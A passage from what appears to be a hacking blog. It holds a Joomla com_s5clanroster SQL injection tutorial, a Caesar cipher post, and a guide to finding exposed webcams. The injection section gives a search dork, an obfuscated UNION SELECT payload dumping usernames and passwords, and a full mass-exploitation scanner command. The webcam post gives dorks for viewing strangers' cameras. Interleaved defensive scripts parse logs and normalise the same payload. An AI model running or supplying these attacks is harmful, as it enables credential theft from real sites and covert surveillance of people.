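    layers = []
    current = value
    for _ in range(max_layers):
        try:
            text = base64.b64decode(current, validate=True).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            break
        if not text.isprintable():
            break
        layers.append(text)
        current = text
    return layers


def scan_log(log_text: str) -> list:
    """Return one finding per request whose decoded 'file' parameter carries a
    traversal sequence or the '@@media' marker, recording how many base64
    layers had to be removed to see it."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        pm = FILE_PARAM_RE.search(m.group("target"))
        if not pm:
            continue
        raw_value = unquote(pm.group(1))
        for depth, text in enumerate(decode_layers(raw_value), start=1):
            hits = [ind for ind in INDICATORS if ind in text]
            if hits:
                findings.append({
                    "ip": m.group("ip"),
                    "script": m.group("target").split("?", 1)[0],
                    "layers": depth,
                    "decoded": text,
                    "indicators": hits,
                    "status": int(m.group("status")),
                })
                break
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged request is the case worth alerting on: the server answered a request whose file name only makes sense as a traversal attempt.<br />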
InurlBR<br />
<br />
Joomla S5 Clan Roster com_s5clanroster SQL Injection exploit (posted 2015-07-06)<h3 style="text-align: center;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>EXPLOIT MASS Joomla - com_s5clanroster</b></span></h3>
<h3 style="text-align: center;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>USE INURLBR</b></span></h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3Dp0gAFoPC0jwYeauGkkRTzKdB7FKT94ecK8grqbr1K0bwYQtXjnQsnZ7-aP5VEtBAkG20YRLSljq004NLDXM-uegfNNmu1MvesI281As9BtJoujZQ3MMHNGFCRgEZ_evg3hNe72m2RYM/s1600/hqdefault.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="In this tutorial we will use the inurlbr tool to find targets and then inject our string of exploration, We will use internal functions of inurlbr script to convert injection string in hexadecimal. The com_s5clanroster compenet has a SQL injection flaw in their GET parameter "id", This article is based on the script written by the hacker TheLooper (script), Where injected successfully is possible to have access to the target server database information." border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3Dp0gAFoPC0jwYeauGkkRTzKdB7FKT94ecK8grqbr1K0bwYQtXjnQsnZ7-aP5VEtBAkG20YRLSljq004NLDXM-uegfNNmu1MvesI281As9BtJoujZQ3MMHNGFCRgEZ_evg3hNe72m2RYM/s400/hqdefault.jpg" title="In this tutorial we will use the inurlbr tool to find targets and then inject our string of exploration, We will use internal functions of inurlbr script to convert injection string in hexadecimal. The com_s5clanroster compenet has a SQL injection flaw in their GET parameter "id", This article is based on the script written by the hacker TheLooper (script), Where injected successfully is possible to have access to the target server database information." width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
In this tutorial we will use the <a href="http://blog.inurl.com.br/search/label/inurlbr#uds-search-results" target="_blank">inurlbr</a> tool to find targets and then inject our exploit string. We will use inurlbr's internal functions to convert the injection string to hexadecimal.<br />
<br />
The com_s5clanroster component has a SQL injection flaw in its GET parameter "id". This article is based on the script written by the hacker TheLooper (<a href="http://pastebin.com/kaczrhus" target="_blank"><b>script</b></a>); when the injection succeeds it is possible to access the target server's database information.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>DORK:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">inurl:"index.php?option=com_s5clanroster"</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>SQL INJECTION:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(username,0x3a,password),222+from+jos_users--%20-</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>POC:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">http://www.target.gov.br/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null<b>{SQL INJECTION}</b></span><br />
<br />
With access to this information we put together our command for mass exploitation.<br />
<b>Let's use the scanner inurlbr: </b><br />
<a href="http://github.com/googleinurl/SCANNER-INURLBR">http://github.com/googleinurl/SCANNER-INURLBR</a><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>SET DORK:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">--dork 'inurl:"index.php?option=com_s5clanroster"'</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>SET FILE OUTPUT:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">-s vuln.log</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>SET TYPE VALIDATION:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">-t 3</span><br />
<i> 3 - The third type combines both the first and second types:</i><br />
<i> Then, of course, it also establishes connection with the exploit through the get method</i><br />
<i> Demo: www.target.com.br{exploit}</i><br />
<div>
<br /></div>
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>SET EXPLOIT REQUEST - GET:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">--exploit-get {YOU_GET}</span><br />
<br />
<i>Before setting the <span style="font-family: Times, Times New Roman, serif;">exploit</span> we manipulate its string: using an internal function of the inurlbr scanner, we pass a validation string inside the SQL injection so that vulnerable targets can be separated from the rest.</i><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Internal function - Converting strings in hexadecimal</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>hex</b> Encrypt values in hex.</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Example: <b><span style="color: red;">hex(</span></b><i>{value}</i><b><span style="color: red;">)</span></b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>hex(</b><i>102030</i><b>)</b></span></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;">--exploit-get 'user?id=<b>hex(</b><i>102030</i><b>)</b>'</span><br /> Result inject:<br /> http://www.target.gov.br/user?id=<i>313032303330</i></span><br />
<div>
<br /></div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;">--exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0x<b>hex(</b>inurlbr_vuln<b>)</b>,username,password,0x<b>hex(</b><br><b>)</b>),222+from+jos_users--%20-'</span></div>
<div>
<br /></div>
<div>
<b>hex(inurlbr_vuln)</b> = <i>696e75726c62725f76756c6e </i></div>
<div>
<b>hex(<br>) </b>= <i>3c62723e</i></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Example injection:</span></b></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">http://www.target.gov.br/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(<b>0x<i>696e75726c62725f76756c6e</i></b>,username,password,<b>0x<i>3c62723e</i></b>),222+from+jos_users--%20-'</span></div>
<div>
<br /></div>
<div>
<b style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; font-size: x-large;">SET </b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>STRING VALIDATION:</b></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Specify the string that will be used on the search script:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Example: -a {string}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Usage: <span style="color: red;"><b>-a</b> '<title>hello world</title>'</span></span></div>
<div>
<span style="font-family: Times, Times New Roman, serif;">If the specified value is found in the target, it is considered vulnerable</span><span style="font-family: Courier New, Courier, monospace;">.</span></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Setting:</b></span><span style="font-family: Courier New, Courier, monospace;"> </span><span style="color: red; font-family: 'Courier New', Courier, monospace;"><b>-a</b> 'inurlbr_vuln'</span></div>
<div>
Let's validate the string "inurlbr_vuln" that we passed inside the SQLi exploit: if that value appears in the target's response, the injection succeeded.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmy-96VIj5FYUXbhItxAD3FP3P6bYtZiW4suWX2KcQZCJjPMEnm31-e0th5jAQ_Pklad2cxRvB4boiXKO-Hg8IkA6kOJTqYc_bBQ-hF5IgfUOqaQD-bYaHEi3BQq5vEBUcyPCdVXjFdF7W/s1600/Captura+de+tela+de+2015-07-06+21%253A39%253A46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="SET STRING VALIDATION: Specify the string that will be used on the search script: Example: -a {string} Usage: -a '<title>hello world</title>' If specific value is found in the target he is considered vulnerable. Setting: -a 'inurlbr_vuln' Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected." border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmy-96VIj5FYUXbhItxAD3FP3P6bYtZiW4suWX2KcQZCJjPMEnm31-e0th5jAQ_Pklad2cxRvB4boiXKO-Hg8IkA6kOJTqYc_bBQ-hF5IgfUOqaQD-bYaHEi3BQq5vEBUcyPCdVXjFdF7W/s640/Captura+de+tela+de+2015-07-06+21%253A39%253A46.png" title="SET STRING VALIDATION: Specify the string that will be used on the search script: Example: -a {string} Usage: -a '<title>hello world</title>' If specific value is found in the target he is considered vulnerable. Setting: -a 'inurlbr_vuln' Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected." width="640" /></a></div>
<div>
<br /></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>COMMAND FULL:</b></span></div>
<div>
<span style="color: red; font-family: 'Courier New', Courier, monospace;">php inurlbr.php <b>--dork</b> 'inurl:"index.php?option=com_s5clanroster"' </span><span style="color: red; font-family: 'Courier New', Courier, monospace;"><b>-s</b> vuln.log </span><span style="color: red; font-family: 'Courier New', Courier, monospace;"><b>-t</b> 3 </span><span style="color: red; font-family: 'Courier New', Courier, monospace;"><b>--exploit-get</b> '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0x</span><b style="color: red; font-family: 'Courier New', Courier, monospace;">hex(</b><span style="color: red; font-family: 'Courier New', Courier, monospace;">inurlbr_vuln</span><b style="color: red; font-family: 'Courier New', Courier, monospace;">)</b><span style="color: red; font-family: 'Courier New', Courier, monospace;">,username,password,0x</span><b style="color: red; font-family: 'Courier New', Courier, monospace;">hex(</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"><br></span><b style="color: red; font-family: 'Courier New', Courier, monospace;">)</b><span style="color: red; font-family: 'Courier New', Courier, monospace;">),222+from+jos_users--%20-'</span></div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-a</b> 'inurlbr_vuln'</span><br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">PRINT PROCESS:</span></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgtChH9XJ3fgMJ9OxwI2keipbfI2BhcoHHPggFMfJX1OowWE7K4Px_UotPMeX2Ij2KEOiTx7NVYWnX6NzUJsooOYVzUocXYt3UhBvpqgG_LH5UyEZ8LqjjkVAOBxKlL7ZPptEsnAbe9ULy/s1600/Captura+de+tela+de+2015-07-06+21%253A56%253A27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="COMMAND FULL: php inurlbr.php --dork 'inurl:"index.php?option=com_s5clanroster"' -s vuln.log -t 3 --exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-' PRINT PROCESS:" border="0" height="359" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgtChH9XJ3fgMJ9OxwI2keipbfI2BhcoHHPggFMfJX1OowWE7K4Px_UotPMeX2Ij2KEOiTx7NVYWnX6NzUJsooOYVzUocXYt3UhBvpqgG_LH5UyEZ8LqjjkVAOBxKlL7ZPptEsnAbe9ULy/s640/Captura+de+tela+de+2015-07-06+21%253A56%253A27.png" title="COMMAND FULL: php inurlbr.php --dork 'inurl:"index.php?option=com_s5clanroster"' -s vuln.log -t 3 --exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-' PRINT PROCESS:" width="640" /></a></div>
<div>
<br /></div>
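For the defending side, an added example that is not code from this post or from inurlbr: the normalisation a WAF rule or log analyser needs before it can match this post's injection string, which hides UNION and SELECT inside MySQL versioned comments (/*!50000 ... */), mixes case, URL-encodes the quote and carries its marker string and HTML tag as 0x hex literals. The query string is constructed from this post's PoC URL exactly as a server would receive it; the signature list and the function names are assumptions for the example.<br />

```python
import re
from urllib.parse import unquote_plus

# Constructed sample: the query string of this post's PoC URL exactly as a web
# server or log analyser would receive it, before URL decoding. Not a capture.
SAMPLE_QUERY = (
    "option=com_s5clanroster&view=s5clanroster&layout=category&task=category"
    "&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat("
    "0x696e75726c62725f76756c6e,username,password,0x3c62723e),222"
    "+from+jos_users--%20-"
)

# MySQL executes the body of a /*!NNNNN ... */ comment on servers at or above
# version NNNNN; naive filters that skip comment bodies therefore miss the
# keywords the post's payload wraps in them.
VERSIONED_COMMENT = re.compile(r"/\*!\d*\s*(.*?)\*/", re.DOTALL)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
HEX_LITERAL = re.compile(r"\b0x([0-9a-f]+)\b")
SIGNATURES = ("union select", "group_concat(", "information_schema")


def normalize(value: str) -> str:
    """Undo the evasions used in the post: URL encoding, versioned comments,
    mixed case and repeated whitespace, so signatures can be matched."""
    text = unquote_plus(value)
    text = VERSIONED_COMMENT.sub(r"\1", text)  # keep the executed body, drop the wrapper
    text = PLAIN_COMMENT.sub(" ", text)        # ordinary comments are only noise
    return re.sub(r"\s+", " ", text).strip().lower()


def decode_hex_literals(normalized: str) -> dict:
    """Decode 0x... literals to text where they are valid UTF-8; the post uses
    them to carry a marker string and an HTML tag without any quote characters."""
    decoded = {}
    for m in HEX_LITERAL.finditer(normalized):
        digits = m.group(1)
        if len(digits) % 2:
            continue
        try:
            decoded["0x" + digits] = bytes.fromhex(digits).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def inspect_query(query_string: str) -> list:
    """Return one finding per parameter whose normalised value matches a signature."""
    findings = []
    for pair in query_string.split("&"):
        name, _, raw = pair.partition("=")
        norm = normalize(raw)
        hits = [sig for sig in SIGNATURES if sig in norm]
        if hits:
            findings.append({
                "param": name,
                "normalized": norm,
                "signatures": hits,
                "hex_literals": decode_hex_literals(norm),
            })
    return findings


if __name__ == "__main__":
    for finding in inspect_query(SAMPLE_QUERY):
        print(finding)
```

Decoding the hex literals is what turns an anonymous alert into a readable one: the analyst sees "inurlbr_vuln" and "&lt;br&gt;" and recognises the marker-string validation technique this post describes.<br />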
InurlBR<br />
<br />
Caesar Cipher (posted 2015-07-06)<h3 style="text-align: center;">
<span style="font-size: large;"><b> # Caesar Cipher in Python </b></span></h3>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh91VbPuvmmF_7qvqrblp7C14BArTdMECPt1OZB71bqGTGCjJB2EO6XD0i3rPM5RRYDcbubValOhHX4bH3V-oi5MDpUiyY0UMT7j-MWYeVHh1tmBvccTxCjBp5JkwXGW8QWr7V6oGTPwWY/s1600/cicada.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Last weekend I was researching an organisation called Cicada 3301, whose main goal is recruiting highly intelligent users from all over the world for a completely unknown purpose. A kind of (puzzle, challenge, riddle), or whatever you want to call it, was Cicada 3301's recruitment method (More information). Researching the kinds of challenges Cicada used, one of them was encoding messages with the classic Caesar cipher (Julius Caesar used it to pass confidential information in the days of Rome). The Caesar cipher was basically this: the letters of the message to be encrypted are replaced by their successors in the alphabet, according to the key." border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh91VbPuvmmF_7qvqrblp7C14BArTdMECPt1OZB71bqGTGCjJB2EO6XD0i3rPM5RRYDcbubValOhHX4bH3V-oi5MDpUiyY0UMT7j-MWYeVHh1tmBvccTxCjBp5JkwXGW8QWr7V6oGTPwWY/s640/cicada.jpg" title="Last weekend I was researching an organisation called Cicada 3301, whose main goal is recruiting highly intelligent users from all over the world for a completely unknown purpose. A kind of (puzzle, challenge, riddle), or whatever you want to call it, was Cicada 3301's recruitment method (More information). Researching the kinds of challenges Cicada used, one of them was encoding messages with the classic Caesar cipher (Julius Caesar used it to pass confidential information in the days of Rome). The Caesar cipher was basically this: the letters of the message to be encrypted are replaced by their successors in the alphabet, according to the key." width="640" /></a></div>
<br />
Hey folks, <a href="https://twitter.com/jh00nbr">jh00n</a> here with you again.<br />
<br />
Last weekend I was researching an organization called <b>Cicada 3301</b>, whose main goal is to recruit highly intelligent users from all over the world for a completely unknown purpose. A kind of puzzle, challenge or enigma (call it what you like) was <b>Cicada 3301</b>'s recruitment method <a href="http://www.medob.com.br/2015/03/cicada-3301.html" target="_blank">(More information)</a>. Looking into the kinds of challenges Cicada used, one of them was encoding messages with the classic Caesar cipher (<a href="https://pt.wikipedia.org/wiki/J%C3%BAlio_C%C3%A9sar" target="_blank">Júlio César</a> used it to pass confidential information in the days of Rome).<br />
<br />
The Caesar cipher was basically this: each letter of the message to be encrypted is replaced by the letter that follows it in the alphabet, as many positions ahead as the key says.<br />
<br />
<ul>
<li> <span style="font-size: large;"><b>Encrypting </b></span></li>
</ul>
Key 3<br />
Alphabet: "abcdefghijklmnopqrstuvwxyz"<br />
Message to be encrypted: "aka"<br />
<br />
In this case you count 3 (the key) positions forward from the letters "a", "k", "a", which gives: dnd. <br />
<ul>
<li> <span style="font-size: large;"><b>Decrypting </b></span></li>
</ul>
Key 3<br />
Message to be decrypted: "dnd"<br />
<br />
It basically works in reverse, and you only need the key: in this case you count 3 positions<br />
backward, which returns the original message: aka. <br />
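<br />
As an added example (not the author's cifradecesar.py script), here is the cipher just described in Python, together with the exhaustive key search that shows why a 26-key cipher protects nothing against an attacker and is only fit for puzzles like Cicada's:<br />

```python
import string
from typing import Dict, Optional

ALPHABET = string.ascii_lowercase  # the 26-letter alphabet used in the post


def _shift_char(ch: str, key: int) -> str:
    """Shift one character `key` places along its alphabet, wrapping around.
    Upper-case letters keep their case; anything else passes through unchanged."""
    for alphabet in (ALPHABET, string.ascii_uppercase):
        if ch in alphabet:
            return alphabet[(alphabet.index(ch) + key) % len(alphabet)]
    return ch


def caesar_encrypt(message: str, key: int) -> str:
    """Replace every letter by the one `key` positions ahead ("aka", key 3 -> "dnd")."""
    return "".join(_shift_char(ch, key) for ch in message)


def caesar_decrypt(ciphertext: str, key: int) -> str:
    """Decryption is the same walk in the opposite direction ("dnd", key 3 -> "aka")."""
    return caesar_encrypt(ciphertext, -key)


def caesar_brute_force(ciphertext: str) -> Dict[int, str]:
    """Every candidate plaintext. Only 26 keys exist (key 0 leaves the text as is),
    so the whole key space is enumerated instantly; this is why the cipher gives
    no confidentiality and survives only in puzzles and CTF challenges."""
    return {key: caesar_decrypt(ciphertext, key) for key in range(len(ALPHABET))}


def recover_key(ciphertext: str, crib: str) -> Optional[int]:
    """Return the key under which the decryption contains `crib` (a word the
    analyst expects to appear in the plaintext), or None if no key produces it."""
    for key, candidate in caesar_brute_force(ciphertext).items():
        if crib in candidate:
            return key
    return None


if __name__ == "__main__":
    secret = caesar_encrypt("aka", 3)
    print(secret, caesar_decrypt(secret, 3), recover_key(secret, "aka"))
```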
<br />
<br />
So I decided to write a Python program that encrypts and decrypts sentences using the Caesar cipher.<br />
<a href="https://github.com/jh00nbr/Python/blob/master/cifradecesar.py" target="_blank">https://github.com/jh00nbr/Python/blob/master/cifradecesar.py </a><br />
<br />
<script src="https://gist.github.com/jh00nbr/42ca35645d2176eb6844.js"></script>
<br />
Author: Unknown<br />
<br />
<b>Looking webcam</b><br />
Published 2015-07-06, updated 2015-07-17.<div style="text-align: center;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Big Brother small</b></span></div>
<br />
Everybody is curious and likes to peek into other people's lives, so I created this little tutorial to help the curious find webcams.<br />
We will use simple <a href="http://blog.inurl.com.br/2012/12/mundo-inurl-conceitoprincipais.html" target="_blank">Dorking</a> techniques and validation strings within the inurlbr scanner.<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">DORK 1</span></b><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="color: red;">inurl:"ViewerFrame?Mode=Refresh" & " Image Size" & intitle:"Network Camera"</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW9joQrotY_-Ru3TPVgWwYAefhXiS7qO-R4XlHy8e6n_dcKuqouqgPaaQf7JpBpYYGjw-nBfpLFx-_7GkznD2BJCxKQHfxRlpUUeSSeDqeTf90O4qo7hN_Vh0U-OQbc28gs8uXBLODLHjE/s1600/Captura+de+tela+de+2015-07-06+09%253A09%253A09.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Search results for DORK 1" border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW9joQrotY_-Ru3TPVgWwYAefhXiS7qO-R4XlHy8e6n_dcKuqouqgPaaQf7JpBpYYGjw-nBfpLFx-_7GkznD2BJCxKQHfxRlpUUeSSeDqeTf90O4qo7hN_Vh0U-OQbc28gs8uXBLODLHjE/s640/Captura+de+tela+de+2015-07-06+09%253A09%253A09.png" width="640" /></a></div>
<br />
<a href="http://blog.inurl.com.br/2010/08/bd-string-busca-cameras.html" target="_blank">More search strings</a><br />
<br />
<span style="font-size: large;">Open <a href="http://blog.inurl.com.br/2011/01/busca-de-webcans-online.html" target="_blank">webcam</a>...</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihsOpfv_rHjglTIfBgbEieSpDiSiCmMQcqP5ldhgm2uECOClwS83IGOnAFWAm1xnDcYT_Fp_Zdvz2vsUmIQkoxS_QFkE_eJW_p1TTaA_mlN591P2Hhlk8BKe4-Bn0G3xAxnftIyvPIge-3/s1600/Captura+de+tela+de+2015-07-06+09%253A17%253A44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihsOpfv_rHjglTIfBgbEieSpDiSiCmMQcqP5ldhgm2uECOClwS83IGOnAFWAm1xnDcYT_Fp_Zdvz2vsUmIQkoxS_QFkE_eJW_p1TTaA_mlN591P2Hhlk8BKe4-Bn0G3xAxnftIyvPIge-3/s640/Captura+de+tela+de+2015-07-06+09%253A17%253A44.png" width="640" /></a></div>
<br />
<br />
Now let's search for webcams in bulk with the help of the inurlbr scanner.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>INURLBR COMMAND </b></span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET DORK:</span></b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>--dork</b> 'inurl:"ViewerFrame?Mode=Refresh" & " Image Size" & intitle:"Network Camera"' </span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET OUTPUT:</span></b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-s</b> can.log </span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET LEVEL TESTS STRINGS:</span></b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-t</b> 2 </span><br />
<i> 2 - The second type tries to valid the error defined by: -a='VALUE_INSIDE_THE _TARGET'</i><br />
<i><br /></i>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET STRING TO BE SOUGHT WITHIN EACH TARGET:</span></b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-a</b> 'Network Camera'</span><br />
or<br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-a</b> '<title>Network Camera'</span><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbW_IiKgm71UDKHMNLcYJuTqe_GwuDtqWJM8pMBUqm8r5SS7LUtBroi9xEeTovSgN657xx6-SyGZGEuDppuCrPHedXYH5qEF0H1quIJADNMEXDpOIJj4JHbQUrtdo6Wx665UTUjWUWR5ID/s1600/Captura+de+tela+de+2015-07-06+09%253A28%253A02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="inurlbr -a validation string" border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbW_IiKgm71UDKHMNLcYJuTqe_GwuDtqWJM8pMBUqm8r5SS7LUtBroi9xEeTovSgN657xx6-SyGZGEuDppuCrPHedXYH5qEF0H1quIJADNMEXDpOIJj4JHbQUrtdo6Wx665UTUjWUWR5ID/s400/Captura+de+tela+de+2015-07-06+09%253A28%253A02.png" width="400" /></a></div>
<div style="text-align: left;">
<b>Another example of validation</b></div>
<div style="text-align: left;">
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-a</b> 'Resolution='</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPaPAjea5cd-98j441GjDKnFh-h-J3jvaohAXjIvCKs7AptlE0Or8tFkQtClOL5S6zLoAw-ywTyq0Ke73BTjJxS4ljJyI3BbqPPyGYANg7TeyCnS5zkledzfs_V3A7yZbrj3E-11obzC7B/s1600/Captura+de+tela+de+2015-07-06+09%253A39%253A44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="inurlbr validation with -a 'Resolution='" border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPaPAjea5cd-98j441GjDKnFh-h-J3jvaohAXjIvCKs7AptlE0Or8tFkQtClOL5S6zLoAw-ywTyq0Ke73BTjJxS4ljJyI3BbqPPyGYANg7TeyCnS5zkledzfs_V3A7yZbrj3E-11obzC7B/s400/Captura+de+tela+de+2015-07-06+09%253A39%253A44.png" width="400" /></a></div>
<br />
I recommend the validation <b>-a 'Resolution='</b>: every webcam page has to set a resolution, but not necessarily a title.<br />
<div class="separator" style="clear: both; text-align: left;">
This parameter makes the scanner request each URL and check whether the desired string is present in the response.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">Command full:</span></b></div>
<span style="color: red; font-family: Courier New, Courier, monospace;">php inurlbr.php --dork 'inurl:"ViewerFrame?Mode=Refresh" & " Image Size" & intitle:"Network Camera"' -s can.log -t 2 -a 'Resolution=' </span><br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">PRINT OUTPUT SCANNER INURLBR VALIDATION:</span></b><br />
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir40tBGIOzvOHF-_4qBFEWao2ygq97CvrHTb154UoMyEehECxHXc380rIpgzRM_I_GFEnk5LmIvce6bnG6jbHuNsUzokd-AwVX0feZN8Z7CqD3tnWhG1qRRKl0GBNWfOwieQZ52FEcJAFf/s1600/Captura+de+tela+de+2015-07-06+09%253A49%253A17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="inurlbr scanner validation output" border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir40tBGIOzvOHF-_4qBFEWao2ygq97CvrHTb154UoMyEehECxHXc380rIpgzRM_I_GFEnk5LmIvce6bnG6jbHuNsUzokd-AwVX0feZN8Z7CqD3tnWhG1qRRKl0GBNWfOwieQZ52FEcJAFf/s640/Captura+de+tela+de+2015-07-06+09%253A49%253A17.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">TERMINAL OUTPUT VIDEO:</span></b></div>
<iframe height="480" src="http://showterm.io/3b6c37d103c73b740886d#fast" width="100%"></iframe>
<br />
<b>More webcam dorks:</b><br />
<div class="separator" style="clear: both; text-align: left;">
